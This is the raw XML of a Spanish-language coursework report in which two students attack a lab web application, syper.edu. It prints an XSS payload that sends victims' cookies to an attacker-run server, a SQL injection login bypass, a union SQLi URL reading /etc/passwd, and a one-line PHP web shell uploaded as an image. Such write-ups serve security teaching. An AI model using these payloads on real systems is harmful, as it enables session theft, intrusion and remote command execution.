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381d317wyrog" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Trabajo de Promoción - SYPER</w:t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q4nz17hzd8sd" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Parte 4 - SAW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hbatf9m97yay" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ivan Karl, 12160/3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ewl8tz29qxy9" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ruta Santiago, 12003/0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Se realizaron ataques de SQLi con la herramienta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sqlmap</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pero dicho input no pudo ser explotado por este método. A continuación se procedió a realizar un ataque de XSS el cual resultó efectivo. Las otras dos opciones se descartaron por su naturaleza.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información más crítica que se podría exponer sería la cookie del usuario.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atacante distribuye la url del sitio vulnerable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www.syper.edu</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), mediante el uso de cadenas de mails o utilizando ingeniería social, con el parámetro de búsqueda con la siguiente inyección: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&lt;script&gt;document.appendChild(document.createElement('img').setAttribute('src','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http://localhost:8500/?q='+document.cookie</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">));&lt;/script&gt;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url a distribuir sería la siguiente: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https://www.syper.edu/index.php?q=&lt;script&gt;document.appendChild(document.createElement('img').setAttribute('src','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http://servidorpubli.co/?q='+document.cookie</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">));&lt;/script&gt;&amp;module=search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 atacante debe contar con un servidor públicamente accesible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http://servidorpubli.co</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> en nuestro ejemplo) en el cual  loggear los datos obtenidos de los requests, luego puede utilizar las cookies obtenidas para impersonarse como la victima.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Si, es posible bypasear el login de la aplicación mediante la siguiente inyección SQL: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User: cualquier_cosa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Pass: 1' or '1' = '1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finalidad de la inyección es devolver siempre verdadero, con lo cual no importa que se busque por un usuario y contraseña específico, aunque este no se encuentre la consulta siempre será “correcta”.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este punto se utilizó la herramienta sqlmap, la cual encontró tres tipos de vulnerabilidades de SQLi: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Blind boolean-based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Blind time-based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Union Query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Como las dos primeras opciones no permiten retribuir datos visualmente, sino sólo basándonos en suposiciones, se utilizó el payload de la tercera opción modificado, en conjunto con el método load_file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http://dev.mysql.com/doc/refman/5.7/en/string-functions.html#function_load-file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) de mysql para nuestros fines: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http://www.syper.edu/index.php?module=view_article&amp;id=-1%20union%20all%20select%20null,%20null,%20load_file(%27/etc/passwd%27),%20null,null,null,null,null,null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224463" cy="3421562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6837" l="15064" r="21314" t="19088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42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 probó realizando la inyección en diferentes parámetros, hasta que el tercero fue el que nos dio los datos en lo que sería el texto del artículo.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También se intentó listar el archivo de usuarios con la opción --os-shell de sqlmap, la cual levanta una shell en el caso de que pueda subirla, pero no funcionó.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B. Para subir la shell se buscó en el sistema algún lugar que permitiera subir archivos, el cual se encontró en la parte de subida de imágenes para los artículos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www.syper.edu/index.php?module=admin/add_image</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). Alli se eligió como archivo a subir nuestra shell.php, la cual constaba de una sola línea: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&lt;?php echo(exec($_GET[‘cmd’]));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Luego para ejecutarlo se busco a que directorio se subian las otras imagenes (/images) y se referencio de la siguiente manera: www.syper.edu/images/shell.php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Demostramos su funcionamiento en la siguiente toma de pantalla:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1016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yper.edu/index.php?module=view_article&amp;id=-1%20union%20all%20select%20null,%20null,%20load_file(%27/etc/passwd%27),%20null,null,null,null,null,null" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.7/en/string-functions.html#function_load-file" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.syper.edu/index.php?module=admin/add_image" TargetMode="External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ervidorpubli.co" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image01.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlmap.org/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.syper.edu" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8500/?q=%27+document.cookie" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8500/?q=%27+document.cookie" TargetMode="External"/></Relationships>
</file>